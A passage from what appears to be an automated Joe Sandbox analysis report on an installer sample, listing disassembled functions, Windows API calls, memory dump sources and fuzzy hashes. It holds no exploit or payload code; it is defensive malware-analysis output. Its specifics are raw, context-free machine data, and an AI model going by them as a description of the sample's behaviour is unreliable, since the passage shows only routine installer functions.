                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                            • String ID: 9
                                                                                            • API String ID: 163830602-2366072709
                                                                                            • Opcode ID: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                                            • Instruction ID: 60624729709df044e3b9a276a2138f1bd207bb457e97f94edfd4483e5cf9eee0
                                                                                            • Opcode Fuzzy Hash: d48387ae3e024a72c6243637e6df33ec40d1b18911dabf8db30d8cce87806c70
                                                                                            • Instruction Fuzzy Hash: 61510974D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D0DBB89982CB58
                                                                                            Function 00404BC9 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BE4
                                                                                            • GetMessagePos.USER32 ref: 00404BEC
                                                                                            • ScreenToClient.USER32(?,?), ref: 00404C06
                                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404C18
                                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C3E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Send$ClientScreen
                                                                                            • String ID: f
                                                                                            • API String ID: 41195575-1993550816
                                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                            • Instruction ID: e2d68be7770c43893e1e2478522bb0d44a2fa382b0b36792216c84cf33d7cb12
                                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                            • Instruction Fuzzy Hash: 6F015E71D00218BAEB00DB94DD85BFFBBBCAF95B11F10412BBA51B61D0C7B49A018BA4
                                                                                            Function 00402DF3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                            • MulDiv.KERNEL32(000A38FA,00000064,000A42D0), ref: 00402E3C
                                                                                            • wsprintfW.USER32 ref: 00402E4C
                                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E5C
                                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E6E
                                                                                            Strings
                                                                                            • verifying installer: %d%%, xrefs: 00402E46
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                                            • String ID: verifying installer: %d%%
                                                                                            • API String ID: 1451636040-82062127
                                                                                            • Opcode ID: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                            • Instruction ID: 3b7df5e00b9d055b55134e233a6447c2e1405f162d6c23549fa63679cea1b34f
                                                                                            • Opcode Fuzzy Hash: 1a328351c5421bd6383489faae0abdae529a3cf17d73acb180239156b2535a4a
                                                                                            • Instruction Fuzzy Hash: 5601677164020CBFDF109F50DD49FAE3B69AB04305F108439FA05B51E0DBB98555CF58
                                                                                            Function 004028AD Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                            • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                            • String ID:
                                                                                            • API String ID: 2667972263-0
                                                                                            • Opcode ID: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                                                                            • Instruction ID: 9b62f472eb3a95df078ad497759be9c31f6c15c11f60cf08f6005a6c9cb4e6e4
                                                                                            • Opcode Fuzzy Hash: 4c7fd7b1f91375a2558ff4a0a047554b9ac13023ec1a621a7b7447f5a49afdce
                                                                                            • Instruction Fuzzy Hash: 9921BFB1C00128BBCF116FA5DE49D9E7E79EF09364F14423AF960762E0CB794C419B98
                                                                                            Function 00401DB9 Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDC.USER32(?), ref: 00401DBC
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                            • CreateFontIndirectW.GDI32(0040CDA8), ref: 00401E3E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                            • String ID:
                                                                                            • API String ID: 3808545654-0
                                                                                            • Opcode ID: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                                            • Instruction ID: 8812a6a15301a194985102fbed33e50eefbd915e65da34b8167a76c641a3bf07
                                                                                            • Opcode Fuzzy Hash: 5bd6bd5a0da59a8b862859853f94caf732d3d6ef064c8fd9610db6583930af4a
                                                                                            • Instruction Fuzzy Hash: 1B017571948240EFE7406BB4AF8A7D97FB49F95301F10457EE241B71E2CA7804459F2D
                                                                                            Function 00401D5D Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                            • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                            • String ID:
                                                                                            • API String ID: 1849352358-0
                                                                                            • Opcode ID: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
                                                                                            • Instruction ID: 7e4da700d615158f321032e6dee441e0afa22e46251462cde10931eea5e4b44d
                                                                                            • Opcode Fuzzy Hash: af37ea9ba388a84de559cbd8ec297e57ada735495d371533b97794bde5efee3a
                                                                                            • Instruction Fuzzy Hash: 59F0EC72A04518AFDB41DBE4DE88CEEB7BCEB48301B14446AF641F61A0CA749D519B38
                                                                                            Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Timeout
                                                                                            • String ID: !
                                                                                            • API String ID: 1777923405-2657877971
                                                                                            • Opcode ID: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                                            • Instruction ID: 5915ba61491c244e76e1eaab0aa102c6a5e0f3d841db56a12d121f6c77e1b82d
                                                                                            • Opcode Fuzzy Hash: 3974eff3514ac80dd6c1aa8123252385dbc5481e5078a21275b56949e15273d0
                                                                                            • Instruction Fuzzy Hash: E621C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605F61D0D7B889409B18
                                                                                            Function 00404ABB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • lstrlenW.KERNEL32(007A1F20,007A1F20,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B5C
                                                                                            • wsprintfW.USER32 ref: 00404B65
                                                                                            • SetDlgItemTextW.USER32(?,007A1F20), ref: 00404B78
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                            • String ID: %u.%u%s%s
                                                                                            • API String ID: 3540041739-3551169577
                                                                                            • Opcode ID: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                                            • Instruction ID: c6a8333de7f2a0e63f9e82a7fb0d3590b97a2c0368f8d4fe0eecd184368e2ceb
                                                                                            • Opcode Fuzzy Hash: e544acf4f0842c60a9c18385703c419e840f736fd1e164df9e130a51ba0441a7
                                                                                            • Instruction Fuzzy Hash: 5711DB736041282BDB00656D9C41F9E329CDB86334F15423BFB25F21D1D978DC1186E8
                                                                                            Function 00402598 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 69stringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • WideCharToMultiByte.KERNEL32(?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00000400,?,?,00000021), ref: 004025E8
                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,?,0040B5A8,000000FF,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,00000400,?,?,00000021), ref: 004025F3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWidelstrlen
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsu4899.tmp
                                                                                            • API String ID: 3109718747-4063874830
                                                                                            • Opcode ID: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
                                                                                            • Instruction ID: 4bb1670e371a3de23f361dcee459543bcfcf4636ee0f51b5b5a9e7d0ab821041
                                                                                            • Opcode Fuzzy Hash: bac47df6fb5c15672e847bcd90d072063b8e9d74f7c5b2892f2d21255f34aeb3
                                                                                            • Instruction Fuzzy Hash: DB11CB72A05300BEDB046FB18E8999F7664AF54399F20843FF502F61D1D9FC89415B5E
                                                                                            Function 00405C17 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,C:\Users\user\AppData\Local\Temp\nsu4899.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405C25
                                                                                            • CharNextW.USER32(00000000), ref: 00405C2A
                                                                                            • CharNextW.USER32(00000000), ref: 00405C42
                                                                                            Strings
                                                                                            • C:\Users\user\AppData\Local\Temp\nsu4899.tmp, xrefs: 00405C18
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2161954861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162021938.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162103553.00000000007D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2162781092.00000000007D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: CharNext
